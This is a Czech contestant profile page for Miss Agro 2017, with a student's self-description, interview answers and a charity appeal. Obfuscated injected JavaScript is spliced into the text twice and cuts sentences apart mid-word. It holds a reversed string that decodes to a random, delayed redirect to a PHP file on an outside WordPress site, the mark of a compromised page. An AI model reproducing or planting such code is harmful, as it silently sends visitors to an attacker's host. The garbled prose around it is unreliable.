Eliška Vaníčková

Profil

Fotografie

Fakulta: PEF
Obor: Podnikání a administrativa (PAANK)
Ročník: 4.
Věk:
24

Eliška je hodně energetický člověk, chvíli neposedí na místě.  Celý život se věnovala tanci, který teď vyměnila za fitness a momentálně si dělá kurz instruktorky. Miluje smích a snaží se mít neustále dobrou náladu, občas jí je plná místnost, ale rozhodně nezkazí žádnou srdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andu. Řídí se heslem „Co se má stát, stane se.“  a snaží se ze všeho brát jen to nejlepší.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2017?

Nejsem úplně typická modelka, jsem hodně svá, chci lidem ukázat, že alespoň v této soutěži nezáleží jen na vzhledu, ale také na tom, co člověk doopravdy umí, jak se vyjadřuje a co má v hlavě, a právě proto bych sem měla stát Miss Agro.

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

Kdybych se měla znovu narodit, chtěla bych se opět narodit do stejného života. Nikdy nemůžeme vědět jaký doopravdy ostatní vědou život, a někdy lidé, kteří se nám zdají nejšťastnější, ve skutečnosti šťastní nejsou a proto bych určitě s nikým neměnila.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Nevěděla jsem jistě jestli půjdu studovat vysokou školu, měla jsem po maturitě hodně snů a plánů, cestovat a poznávat nové věci, nové lidi. Podala jsem jedinou přihlášku a ona vyšla. Takže to bylo znamení a já jsem zde začala studovat. Nejlepší na této škole je, že všichni držíme za jeden provaz a společně se snažíme dotáhnout studium do konce.